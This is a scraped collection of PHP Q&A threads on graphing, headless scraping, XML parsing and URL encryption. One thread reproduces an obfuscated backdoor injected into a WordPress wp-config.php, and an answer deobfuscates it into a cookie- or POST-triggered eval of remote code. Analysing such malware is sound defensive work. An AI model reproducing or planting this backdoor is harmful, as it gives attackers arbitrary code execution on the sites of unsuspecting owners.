PHPmyGraph: send an array with GET - php

I could not find any answer to my question.
I'm using PhPmyGraph ( http://phpmygraph.abisvmm.nl/ ) to display a graph of some data from my databases.
The problem is that I have to create my arrays in the file itself, and if I want 2 graphs on the page I need to create 2 different files.
Apparently the file is easier to use with a CMS but I'm not using one.
This is the file graph.php:
<?php
//Set content-type header for the graphs
header("Content-type: image/png");
//Include phpMyGraph5.0.php
include_once('../phpMyGraph5.0.php');
//Set config directives
$cfg['title'] = 'Example graph';
$cfg['width'] = 500;
$cfg['height'] = 250;
//Set data
$data = array(
'Jan' => 12,
'Nov' => 78,
'Dec' => 23
);
//Create phpMyGraph instance
$graph = new phpMyGraph();
//Parse
$graph->parseVerticalPolygonGraph($data, $cfg);
?>
I call it in my page index.php:
echo " < img src=\"graph.php\"> ";
Is there another way to do it? And send the data from index.php to graph.php?
Or maybe move the code graph.php into index.php ? The problem is for the image object, I don't really know how to do it!
UPDATE:
I have almost found a solution, my code is now:
in graph.php:
//Parse
$graph->parseVerticalPolygonGraph(unserialize($_GET['data']), $cfg);
index.php :
$select_daily = mysql_query("SELECT * FROM table");
while ($row_daily = mysql_fetch_assoc($select_daily) ){
$y = substr($row_daily['ymd'], 0, -4); // Year
$m = substr($row_daily['ymd'], 4, -2); // Month
$d = substr($row_daily['ymd'], -2); // Day
$key = $d."/".$m."/".$y;
$data_daily [$key] = $row_daily['members'];
}
foreach($data_daily as $key => $value) {
echo $key ,' : ', $value ,'<br/>';
}
echo "< img src=\"graph.php?data=".serialize($data_daily)."\">";
But I get the error "provided data is not an array"
I can't see what's wrong with it?
if I do var_dump($data_daily) I get:
array(8) { ["14/12/2011"]=> string(1) "0" ["13/12/2011"]=> string(2)
"11" ["12/12/2011"]=> string(1) "0" ["11/12/2011"]=> string(1) "2"
["10/12/2011"]=> string(1) "9" ["09/12/2011"]=> string(1) "3"
["08/12/2011"]=> string(1) "6" ["07/12/2011"]=> string(1) "6" }
UPDATE2:
var_dump($data1); gives:
array(12) { ["Jan"]=> int(12) ["Feb"]=>
int(25) ["Mar"]=> int(0) ["Apr"]=> int(7) ["May"]=> int(80) ["Jun"]=>
int(67) ["Jul"]=> int(45) ["Aug"]=> int(66) ["Sep"]=> int(23)
["Oct"]=> int(23) ["Nov"]=> int(78) ["Dec"]=> int(23) }
and var_dump($s_data1 = serialize($data1)) gives:
a:12:s:3:"Jan";i:12;s:3:"Feb";i:25;s:3:"Mar";i:0;s:3:"Apr";i:7;s:3:"May";i:80;s:3:"Jun";i:67;s:3:"Jul";i:45;s:3:"Aug";i:66;s:3:"Sep";i:23;s:3:"Oct";i:23;s:3:"Nov";i:78;s:3:"Dec";i:23;}
Then unserialize($s_data1); gives the same thing than $data1
So the argument 1 of the parse should be correct... I can’t see what is wrong
I finally gave up and loaded my arrays in graph.php:
if ($_GET['data'] == 'daily'){
$cfg['title'] = 'daily';
$graph->parseVerticalPolygonGraph($data_daily, $cfg);
}
And I call the file like that:
echo "<img src=\"graph.php?data=daily\">";
Thanks for your help anyway


I previously needed a page to display multiple graphs using phpMyGraph and the approach I took was to use data URI's and php's ob_start() and ob_get_clean()
Simply use this for each graph:
ob_start();
$graph->parseVerticalPolygonGraph($data, $cfg);
$img = ob_get_clean();
echo "<img src='data:image/gif;base64," . base64_encode($img) . "/>";
I recommend using gif's for the format since that way your page size will not be huge, you can do this by setting $cfg["type"] to "gif" (See here http://phpmygraph.abisvmm.nl/#ConfigDirectives)
This will also reduce the overhead of multiple requests and prevent hotlinking to the images.
You can read more about data URI's here
http://en.wikipedia.org/wiki/Data_URI_scheme


you might want to try
echo "< img src=\"graph.php?data=".urlencode(serialize($data_daily))."\">"
I might be misunderstanding which script is throwing the error, however (I'm presuming that it's graph.php that's giving you the provided data is not an array).


Try using json instead of serialize
echo "< img src=\"graph.php?data=".urlencode(json_encode($data_daily))."\">"
$graph->parseVerticalPolygonGraph(json_decode($_GET['data'],true), $cfg);
I see no reason for this to throw an error.

Related

Puphpeteer - Get text and href-attribute from link

I am using "#nesk/puphpeteer": "^2.0.0" Link to Github-Repo and want get the text and the href-attribute from a link.
I tried the following:
<?php
require_once '../vendor/autoload.php';
use Nesk\Puphpeteer\Puppeteer;
use Nesk\Rialto\Data\JsFunction;
$debug = true;
$puppeteer = new Puppeteer([
'read_timeout' => 100,
'debug' => $debug,
]);
$browser = $puppeteer->launch([
'headless' => !$debug,
'ignoreHTTPSErrors' => true,
]);
$page = $browser->newPage();
$page->goto('http://example.python-scraping.com/');
//get text and link
$links = $page->querySelectorXPath('//*[#id="results"]/table/tbody/tr/td/div/a', JsFunction::createWithParameters(['node'])
->body('return node.textContent;'));
// iterate over links and print each link and its text
// get single text
$singleText = $page->querySelectorXPath('//*[#id="pagination"]/a', JsFunction::createWithParameters(['node'])
->body('return node.textContent;'));
$browser->close();
When I run the above script I get the nodes from the page, BUT I cannot access the attributes or the text?
Any suggestions how to do this?
I appreciate your replies!

querySelectorXPath return array of ElementHandle. one more thing querySelectorXPath does not support callback function.
first get all node ElementHandle
$links = $page->querySelectorXPath('//*[#id="results"]/table/tbody/tr/td/div/a');
then loop over links to access attributes or text of node
foreach($links as $link){
// for text
$text = $link->evaluate(JsFunction::createWithParameters(['node'])
->body('return node.innerText;'));
// for link
$link = $link->evaluate(JsFunction::createWithParameters(['node'])
->body('return node.href;'));
}

Disclaimer: This is just an intermediate answer - I would update once I've got more specific requests on HTML attrs or other expectations to be retrieved.
tl;dr: Mentioned composer package nesk/puphpeteer really is just a wrapper to underlying NodeJS based implementation of puppeteer. Thus, accessing data and structures has to be "similar" to their JavaScript counterparts...
Maybe Codeception (headless) or symfony/dom-crawler (raw markup) might be better and more mature alternatives.
Anyway, let's pick the example from above and go through it step by step:
$links = $page->querySelectorXPath(
'//*[#id="results"]/table/tbody/tr/td/div/a',
JsFunction::createWithParameters(['node'])->body('return node.textContent;')
);
XPath query $x() would result in an array of ElementHandle items
to access exported node.textContent (from JsFunction), corresponding data gets fetched via ElementHandle.getProperty(prop)
exporting a scalar value (to PHP) is then done via ElementHandle.jsonValue()
Thus, after that we would have something like this:
$links = $page->querySelectorXPath(
'//*[#id="results"]/table/tbody/tr/td/div/a',
JsFunction::createWithParameters(['node'])->body('return node.textContent;')
);
/** #var \Nesk\Puphpeteer\Resources\ElementHandle $link */
foreach ($links as $link) {
var_dump($link->getProperty('textContent')->jsonValue());
}
Which outputs the following raw data (as retrieved from http://example.python-scraping.com/):
string(12) " Afghanistan"
string(14) " Aland Islands"
string(8) " Albania"
string(8) " Algeria"
string(15) " American Samoa"
string(8) " Andorra"
string(7) " Angola"
string(9) " Anguilla"
string(11) " Antarctica"
string(20) " Antigua and Barbuda"

XML is not parsed in php

In my controller, I read a data from DB. (where AlarmDeatils is a stored as XML content. Eg:AlarmDeatils column contains
<SiteAlarmDetails>
<AlertId>89637</AlertId>
<SiteCode>20157498</SiteCode>
<SiteName>newport</SiteName>
<TankNumber>4</TankNumber>
<DispenserNumbedr>3</DispenserNumbedr>
<HoseNumber>3</HoseNumber>
<GradeId>11</GradeId>
<GradeName>PULP98</GradeName>
<AlarmUTCDateTime>2015-10-08T12:00:00</AlarmUTCDateTime>
<AlarmClearedUTCDateTime>2015-10-08T22:00:00</AlarmClearedUTCDateTime>
<UTCTimeZoneName>GMT Standard Time</UTCTimeZoneName>
<AlarmVolume>0</AlarmVolume>
<AlarmLevel>0</AlarmLevel>
<TankCapacity>0</TankCapacity>
<TankCapacityPercent>0</TankCapacityPercent>
<TankOverfill>0</TankOverfill>
<TankUllage>0</TankUllage>
<ProductLoss>0</ProductLoss>
<HoursElapsed>10</HoursElapsed>
<WaterLevel>0</WaterLevel>
<AvgSalesPerDay>0</AvgSalesPerDay>
<DaysToStockOut>0</DaysToStockOut>
<InvalidDataCount>0</InvalidDataCount>
<ValidDataCount>0</ValidDataCount>
<ZeroVolumeCount>0</ZeroVolumeCount>
<ZeroProductLevelCount>0</ZeroProductLevelCount>
<ZeroTotaliserAmountCount>0</ZeroTotaliserAmountCount>
</SiteAlarmDetails>
I read that that row in my controller like;
$tableAlarm = \DB::table('Alarm')
->where('Alarm.AlarmId', '=', $id)->first();
and when I use
var_dump($tableAlarm);
I get
object(stdClass)#241 (10) { ["AlarmId"]=> string(6) "245039" ["MessageNotificationId"]=> string(6) "219078" ["CompanyId"]=> string(2) "19" ["CompanyCode"]=> string(7) "MCCOLLS" ["AlertTypeId"]=> string(2) "23" ["AlarmDetails"]=> string(1408) "979381320106510Eyemouth Service Station2017-07-23T21:26:499999-12-31T23:59:59.9999999GMT Standard Time00000005000000000001-01-01T00:00:000001-01-01T00:00:000001-01-01T00:00:000000001-01-01T00:00:00" ["AlertProcessStateId"]=> string(1) "2" ["UTCDateTimeInserted"]=> string(27) "2017-07-24 02:15:36.9300000" ["UTCDateTimeUpdated"]=> string(27) "2017-07-24 02:15:36.9300000" ["RowDataVersion"]=> string(16) "00000000117D854B" }
Im trying to parse the AlarmDeatils column like;
$alertXml = simplexml_load_string( $tableAlarm->AlarmDetails);
echo $alertXml;//Nothing printed
But i'm not getting anything :( I'm trying to process that xml like;
foreach($alertXml->children() as $alerts)
{
print_r( $alerts->AlertId);// **getting SimpleXMLElement Object ()**
echo $alerts->AlertId;//**Nothing printed**
}

Hope this will be helpful. Try this simplest one.
Try this code snippet here
<?php
$xmlString=<<<XML
<SiteAlarmDetails>
<AlertId>89637</AlertId>
<SiteCode>20157498</SiteCode>
<SiteName>newport</SiteName>
<TankNumber>4</TankNumber>
<DispenserNumbedr>3</DispenserNumbedr>
<HoseNumber>3</HoseNumber>
<GradeId>11</GradeId>
<GradeName>PULP98</GradeName>
<AlarmUTCDateTime>2015-10-08T12:00:00</AlarmUTCDateTime>
<AlarmClearedUTCDateTime>2015-10-08T22:00:00</AlarmClearedUTCDateTime>
<UTCTimeZoneName>GMT Standard Time</UTCTimeZoneName>
<AlarmVolume>0</AlarmVolume>
<AlarmLevel>0</AlarmLevel>
<TankCapacity>0</TankCapacity>
<TankCapacityPercent>0</TankCapacityPercent>
<TankOverfill>0</TankOverfill>
<TankUllage>0</TankUllage>
<ProductLoss>0</ProductLoss>
<HoursElapsed>10</HoursElapsed>
<WaterLevel>0</WaterLevel>
<AvgSalesPerDay>0</AvgSalesPerDay>
<DaysToStockOut>0</DaysToStockOut>
<InvalidDataCount>0</InvalidDataCount>
<ValidDataCount>0</ValidDataCount>
<ZeroVolumeCount>0</ZeroVolumeCount>
<ZeroProductLevelCount>0</ZeroProductLevelCount>
<ZeroTotaliserAmountCount>0</ZeroTotaliserAmountCount>
</SiteAlarmDetails>
XML;
$xml=simplexml_load_string($xmlString);
echo (string)$xml->AlertId;//type-casted to string
echo PHP_EOL;
echo (string)$xml->SiteCode;
echo PHP_EOL;
echo (string)$xml->SiteName;

Wordpress Hacked, understanding obfuscated line on wp-config.php

my friend's wordpress wp-config.php was added with one line of code:
$ge142efa['cfea']="\x6d\x57\x36\x5f\x6b\x64\x2f\x49\x42\x7e\x4b\x45\x72\x6c\x28\x2e\x7a\x3a\x2a\x39\x37\x61\x67\x22\x73\x31\x38\x9\x48\x23\x70\x34\x7c\x30\x26\x43\x2b\x27\x78\x3d\x75\x68\x5a\x54\x4c\x51\x79\xd\x5b\x4e\x33\x50\xa\x44\x55\x32\x4a\x20\x3c\x25\x65\x69\x46\x60\x59\x4f\x21\x56\x71\x74\x53\x24\x5e\x40\x47\x2c\x6e\x5d\x5c\x3b\x4d\x58\x76\x3f\x35\x29\x7b\x7d\x52\x63\x6f\x77\x66\x6a\x62\x3e\x41\x2d";$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][92].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][94]]=$ge142efa['cfea'][89].$ge142efa['cfea'][41].$ge142efa['cfea'][12];$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][26]]=$ge142efa['cfea'][90].$ge142efa['cfea'][12].$ge142efa['cfea'][5];$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]=$ge142efa['cfea'][24].$ge142efa['cfea'][69].$ge142efa['cfea'][12].$ge142efa['cfea'][13].$ge142efa['cfea'][60].$ge142efa['cfea'][76];$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]=$ge142efa['cfea'][61].$ge142efa['cfea'][76].$ge142efa['cfea'][61].$ge142efa['cfea'][3].$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][69];$ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]=$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][61].$ge142efa['cfea'][21].$ge142efa['cfea'][13].$ge142efa['cfea'][61].$ge142efa['cfea'][16].$ge142efa['cfea'][60];$ge142efa[$ge142efa['cfea'][16].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][50].$ge142efa['cfea'][89]]=$ge142efa['cfea'][30].$ge142efa['cfea'][41].$ge142efa['cfea'][30].$ge142efa['cfea'][82].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][24].$ge142efa['cfea'][61].$ge142efa['cfea'][90].$ge142efa['cfea'][76];$ge142efa[$ge142efa['cfea'][61].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][26].$ge142efa['cfea'][50].$ge142efa['cfea'][33].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]=$ge142efa['cfea'][40].$ge142efa['cfea'][76].$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][61].$ge142efa['cfea'][21].$ge142efa['cfea'][13].$ge142efa['cfea'][61].$ge142efa['cfea'][16].$ge142efa['cfea'][60];$ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][92].$ge142efa['cfea'][26].$ge142efa['cfea'][20].$ge142efa['cfea'][50].$ge142efa['cfea'][2]]=$ge142efa['cfea'][94].$ge142efa['cfea'][21].$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][2].$ge142efa['cfea'][31].$ge142efa['cfea'][3].$ge142efa['cfea'][5].$ge142efa['cfea'][60].$ge142efa['cfea'][89].$ge142efa['cfea'][90].$ge142efa['cfea'][5].$ge142efa['cfea'][60];$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][89].$ge142efa['cfea'][33].$ge142efa['cfea'][84]]=$ge142efa['cfea'][24].$ge142efa['cfea'][60].$ge142efa['cfea'][69].$ge142efa['cfea'][3].$ge142efa['cfea'][69].$ge142efa['cfea'][61].$ge142efa['cfea'][0].$ge142efa['cfea'][60].$ge142efa['cfea'][3].$ge142efa['cfea'][13].$ge142efa['cfea'][61].$ge142efa['cfea'][0].$ge142efa['cfea'][61].$ge142efa['cfea'][69];$ge142efa[$ge142efa['cfea'][40].$ge142efa['cfea'][31].$ge142efa['cfea'][19].$ge142efa['cfea'][25]]=$ge142efa['cfea'][61].$ge142efa['cfea'][31].$ge142efa['cfea'][2].$ge142efa['cfea'][25];$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][55].$ge142efa['cfea'][55].$ge142efa['cfea'][19].$ge142efa['cfea'][26].$ge142efa['cfea'][2].$ge142efa['cfea'][26].$ge142efa['cfea'][55]]=$ge142efa['cfea'][22].$ge142efa['cfea'][55].$ge142efa['cfea'][94].$ge142efa['cfea'][89];$ge142efa[$ge142efa['cfea'][12].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][94].$ge142efa['cfea'][92]]=$_POST;$ge142efa[$ge142efa['cfea'][93].$ge142efa['cfea'][19].$ge142efa['cfea'][20].$ge142efa['cfea'][84]]=$_COOKIE;#$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]($ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][12].$ge142efa['cfea'][90].$ge142efa['cfea'][12].$ge142efa['cfea'][3].$ge142efa['cfea'][13].$ge142efa['cfea'][90].$ge142efa['cfea'][22],NULL);#$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]($ge142efa['cfea'][13].$ge142efa['cfea'][90].$ge142efa['cfea'][22].$ge142efa['cfea'][3].$ge142efa['cfea'][60].$ge142efa['cfea'][12].$ge142efa['cfea'][12].$ge142efa['cfea'][90].$ge142efa['cfea'][12].$ge142efa['cfea'][24],0);#$ge142efa[$ge142efa['cfea'][38].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][21].$ge142efa['cfea'][84].$ge142efa['cfea'][60].$ge142efa['cfea'][5].$ge142efa['cfea'][60]]($ge142efa['cfea'][0].$ge142efa['cfea'][21].$ge142efa['cfea'][38].$ge142efa['cfea'][3].$ge142efa['cfea'][60].$ge142efa['cfea'][38].$ge142efa['cfea'][60].$ge142efa['cfea'][89].$ge142efa['cfea'][40].$ge142efa['cfea'][69].$ge142efa['cfea'][61].$ge142efa['cfea'][90].$ge142efa['cfea'][76].$ge142efa['cfea'][3].$ge142efa['cfea'][69].$ge142efa['cfea'][61].$ge142efa['cfea'][0].$ge142efa['cfea'][60],0);#$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][89].$ge142efa['cfea'][33].$ge142efa['cfea'][84]](0);$tf027f=NULL;$w38258dd=NULL;$ge142efa[$ge142efa['cfea'][0].$ge142efa['cfea'][33].$ge142efa['cfea'][33].$ge142efa['cfea'][25].$ge142efa['cfea'][89].$ge142efa['cfea'][26].$ge142efa['cfea'][31].$ge142efa['cfea'][20].$ge142efa['cfea'][84]]=$ge142efa['cfea'][33].$ge142efa['cfea'][31].$ge142efa['cfea'][20].$ge142efa['cfea'][92].$ge142efa['cfea'][94].$ge142efa['cfea'][84].$ge142efa['cfea'][31].$ge142efa['cfea'][94].$ge142efa['cfea'][97].$ge142efa['cfea'][26].$ge142efa['cfea'][19].$ge142efa['cfea'][89].$ge142efa['cfea'][20].$ge142efa['cfea'][97].$ge142efa['cfea'][31].$ge142efa['cfea'][33].$ge142efa['cfea'][94].$ge142efa['cfea'][31].$ge142efa['cfea'][97].$ge142efa['cfea'][26].$ge142efa['cfea'][26].$ge142efa['cfea'][25].$ge142efa['cfea'][55].$ge142efa['cfea'][97].$ge142efa['cfea'][84].$ge142efa['cfea'][20].$ge142efa['cfea'][92].$ge142efa['cfea'][21].$ge142efa['cfea'][26].$ge142efa['cfea'][94].$ge142efa['cfea'][55].$ge142efa['cfea'][2].$ge142efa['cfea'][25].$ge142efa['cfea'][5].$ge142efa['cfea'][33].$ge142efa['cfea'][20];global$m001c8475;function g2bc($tf027f,$p7ec){global$ge142efa;$de211af="";for($z225cd560=0;$z225cd560<$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]($tf027f);){for($a7a4f09df=0;$a7a4f09df<$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]($p7ec)&&$z225cd560<$ge142efa[$ge142efa['cfea'][22].$ge142efa['cfea'][60].$ge142efa['cfea'][25].$ge142efa['cfea'][19].$ge142efa['cfea'][19].$ge142efa['cfea'][31].$ge142efa['cfea'][20]]($tf027f);$a7a4f09df++,$z225cd560++){$de211af.=$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][92].$ge142efa['cfea'][21].$ge142efa['cfea'][55].$ge142efa['cfea'][94]]($ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][26]]($tf027f[$z225cd560])^$ge142efa[$ge142efa['cfea'][41].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][26]]($p7ec[$a7a4f09df]));}}return$de211af;}function i461($tf027f,$p7ec){global$ge142efa;global$m001c8475;return$ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][55].$ge142efa['cfea'][55].$ge142efa['cfea'][19].$ge142efa['cfea'][26].$ge142efa['cfea'][2].$ge142efa['cfea'][26].$ge142efa['cfea'][55]]($ge142efa[$ge142efa['cfea'][82].$ge142efa['cfea'][55].$ge142efa['cfea'][55].$ge142efa['cfea'][19].$ge142efa['cfea'][26].$ge142efa['cfea'][2].$ge142efa['cfea'][26].$ge142efa['cfea'][55]]($tf027f,$m001c8475),$p7ec);}foreach($ge142efa[$ge142efa['cfea'][93].$ge142efa['cfea'][19].$ge142efa['cfea'][20].$ge142efa['cfea'][84]]as$p7ec=>$i61171){$tf027f=$i61171;$w38258dd=$p7ec;}if(!$tf027f){foreach($ge142efa[$ge142efa['cfea'][12].$ge142efa['cfea'][60].$ge142efa['cfea'][84].$ge142efa['cfea'][94].$ge142efa['cfea'][92]]as$p7ec=>$i61171){$tf027f=$i61171;$w38258dd=$p7ec;}}$tf027f=#$ge142efa[$ge142efa['cfea'][61].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][26].$ge142efa['cfea'][50].$ge142efa['cfea'][33].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]($ge142efa[$ge142efa['cfea'][40].$ge142efa['cfea'][31].$ge142efa['cfea'][19].$ge142efa['cfea'][25]]($ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][92].$ge142efa['cfea'][26].$ge142efa['cfea'][20].$ge142efa['cfea'][50].$ge142efa['cfea'][2]]($tf027f),$w38258dd));if(isset($tf027f[$ge142efa['cfea'][21].$ge142efa['cfea'][4]])&&$m001c8475==$tf027f[$ge142efa['cfea'][21].$ge142efa['cfea'][4]]){if($tf027f[$ge142efa['cfea'][21]]==$ge142efa['cfea'][61]){$z225cd560=Array($ge142efa['cfea'][30].$ge142efa['cfea'][82]=>#$ge142efa[$ge142efa['cfea'][16].$ge142efa['cfea'][55].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][50].$ge142efa['cfea'][89]](),$ge142efa['cfea'][24].$ge142efa['cfea'][82]=>$ge142efa['cfea'][25].$ge142efa['cfea'][15].$ge142efa['cfea'][33].$ge142efa['cfea'][97].$ge142efa['cfea'][25],);echo#$ge142efa[$ge142efa['cfea'][4].$ge142efa['cfea'][84].$ge142efa['cfea'][33].$ge142efa['cfea'][84].$ge142efa['cfea'][25]]($z225cd560);}elseif($tf027f[$ge142efa['cfea'][21]]==$ge142efa['cfea'][60]){eval($tf027f[$ge142efa['cfea'][5]]);}exit();}
What does it means?
I've tried to change eval to print, but nothing shown.
https://eval.in/584427

By using a var_dump after the first statement with $_COOKIE I could see that the structure of the first array appears to contain several function names which are supposedly called later:
var_dump($ge142efa);
array(14) {
["cfea"]=>
[N3Pring(98) "mW6_kd/IB~KErl(.z:*97ag"s18 H#p4|0&C+'x=uhZTLQy
DU2J <%eiF`YO!VqtS$^#G,n]\;MXv?5){}Rcowfjb>A-"
["hfa2b"]=>
string(3) "chr"
["he58"]=>
string(3) "ord"
["ge19947"]=>
string(6) "strlen"
["xa2a5ede"]=>
string(7) "ini_set"
["k5051"]=>
string(9) "serialize"
["z2503c"]=>
string(10) "phpversion"
["i50830251"]=>
string(11) "unserialize"
["kf8736"]=>
string(13) "base64_decode"
["vc05"]=>
string(14) "set_time_limit"
["u491"]=>
string(4) "i461"
["v2298682"]=>
string(4) "g2bc"
["re5bf"]=>
string(6) "$_POST"
["j975"]=>
string(8) "$_COOKIE"
}
I have replaced the $_POST and $_COOKIE contents with strings as placeholders because my test environment is php -f inside a container.
The part between this array and the first function declaration boils down to this:
#ini_set('error_log', NULL); // #$ge142efa['xa2a5ede']('error_log', NULL);
#ini_set('log_errors', 0); // #$ge142efa['xa2a5ede']('log_errors', 0);
#ini_set('max_execution_time', 0); // #$ge142efa['xa2a5ede']('max_execution_time', 0);
#set_time_limit(0); // #$ge142efa['vc05'](0);
$tf027f = NULL;
$w38258dd = NULL;
$ge142efa['m001c8475'] = '047fb54b-89c7-40b4-8812-57fa8b261d07';
The first function reads thus:
function g2bc($tf027f, $p7ec){
global $ge142efa;
$de211af = "";
for($i = 0; $i < "strlen"($tf027f);){
for($j = 0; $j < "strlen"($p7ec) && $i < "strlen"($tf027f); $j++, $i++){
$de211af .= "chr"("ord"($tf027f[$i])^"ord"($p7ec[$j]));
}
}
return $de211af;
}
It appears to xor two strings and return the result.
The function below that, i461, uses it twice:
function i461($tf027f, $p7ec){
global $ge142efa;
global $m001c8475;
return "g2bc"("g2bc"($tf027f,$m001c8475),$p7ec);
}
The code below these two functions
can be beautified to this:
foreach($_COOKIE as $p7ec => $i61171){
$tf027f = $i61171;
$w38258dd = $p7ec;
}
if(!$tf027f){
foreach($_POST as $p7ec => $i61171){
$tf027f = $i61171;
$w38258dd = $p7ec;
}
}
$tf027f =# "unserialize"("i461"("base64_decode"($tf027f),$w38258dd));
if(isset($tf027f["ak"]) && $m001c8475 == $tf027f["ak"]){
if($tf027f["a"] == "i"){
$z225cd560 = Array("pv" => #"phpversion"(), "sv" => "1.0-1",);
echo#"serialize"($z225cd560);
}elseif($tf027f["a"] == "e"){
eval($tf027f["d"]);
}
exit();
}
The critical part here is the eval. From my point of view this looks like code that executes something given by the right combination of $_COOKIE and/or $_POST. Basically a portion of code waiting to get the right request and execute the code specified by it.

I'm Just dealing with same issue. Your friend's have to make some changes. May be IP Address is traced by some person & he is doing some changes in database and it's affecting your front end and code also.
- If you have backup of database then change the database.
- Install some security Plugin like All In One WP Security & Firewall.
(Because if IP is traced again than it may help in future).
Some other changes.
Search Images path in database may be it contains malware.
Remove unused script from code.
Change Admin panel login credential.
Change Cpanel credential.

PHP Mcrypt_decrypt decrypt only parts of the original string

I have a weird problem regarding passing an encrypted string through url. I'm using base64 encryptions from mcrypt() for encryptHTML() and decryptHTML().
I have this piece of code to encrypt:
$link_string = http_build_query(array('index_number'=>30843854, 'extra_attendence_id'=>27982423, 'target_temporary_id'=>378492085, 'date'=>'2016-05-06', 'action'=>'OUT', 'target_id'=>390234), '', '&');
$link_string = encryptHTML($link_string);
then I passed it through this url:
'localhost/website/controller/action/'.$link_string
then I decrypted it with this piece of code:
$id = $this->request->param('id');
$id = decryptHTML($id);
parse_str($id, $arr_id2);
var_dump($arr_id2);
I will get these in return, as expected:
array(6) { ["index_number"]=> string(8) "30843854" ["extra_attendence_id"]=> string(8) "27982423" ["target_temporary_id"]=> string(9) "378492085" ["date"]=> string(10) "2016-05-06" ["action"]=> string(3) "OUT" ["target_id"]=> string(6) "390234" }
The next case is when I still want the encrypted link but I need to attach some other value from DOM element in the page, so I tried to
'localhost/website/controller/action/encrypt='.$link_string.'&DOMvalue=10000'
then I modified the decryption with this piece of code:
$id = $this->request->param('id');
parse_str($id, $arr_id2);
$the_DOMValue = $arr_id2['DOMvalue'];
$id = decryptHTML($arr_id2['crypted']);
parse_str($id, $arr_id);
var_dump($the_DOMValue); echo "<br>";
var_dump($arr_id);
But then, I get these in return, to my surprise:
string(5) "10000"
array(3) { ["index_number"]=> string(13) "58_2016-04-26" ["extra_attendence_id"]=> string(1) "0" ["target_t"]=> string(0) "" }
My original string was cut short! Note that the DOMvalue is fine.
Then, I checked that right before both decryption, if the given encrypted string is different:
on first case of decryptHTML:
$id = $this->request->param('id');
var_dump($id);
$id = decryptHTML($id);
returns:
string(224) "zCQnh-rNP2R7h4UHyV5Dm5zp494DIIku5LWN51yYGMXBaHf0gJgEDw8UCuHRZxr-CkjkevHQ70kOPnSBQ9CJP6lZrFone-nDMDJhYlL8330wz+zud8-3tSWvdOLB7je5D-22aX4OrE3zlBYZZZtI-rMT73H0JGIRzZge2GzcZGLwS7Rj+GL5Ym-ET6JEHDShST4etgcQaEYXml-+BZ2+0BQKvubZEBOB"
on the second case of decryptHTML:
$id = $this->request->param('id');
parse_str($id, $arr_id2);
$the_DOMValue = $arr_id2['DOMvalue'];
var_dump($arr_id2['crypted']);
$id = decryptHTML($arr_id2['crypted']);
returns:
string(224) "zCQnh-rNP2R7h4UHyV5Dm5zp494DIIku5LWN51yYGMXBaHf0gJgEDw8UCuHRZxr-CkjkevHQ70kOPnSBQ9CJP6lZrFone-nDMDJhYlL8330wz zud8-3tSWvdOLB7je5D-22aX4OrE3zlBYZZZtI-rMT73H0JGIRzZge2GzcZGLwS7Rj GL5Ym-ET6JEHDShST4etgcQaEYXml- BZ2 0BQKvubZEBOB"
It looks exactly the same to me, but strangely it was decrypted differently. I of course used the same functions to decrypt both cases...
Anybody can shed me some light on this?

passing an encrypted string through url
Passing an encrypted string through a URL is a bad idea. Full stop.
I'm using base64 encryptions from mcrypt() for encryptHTML() and decryptHTML().
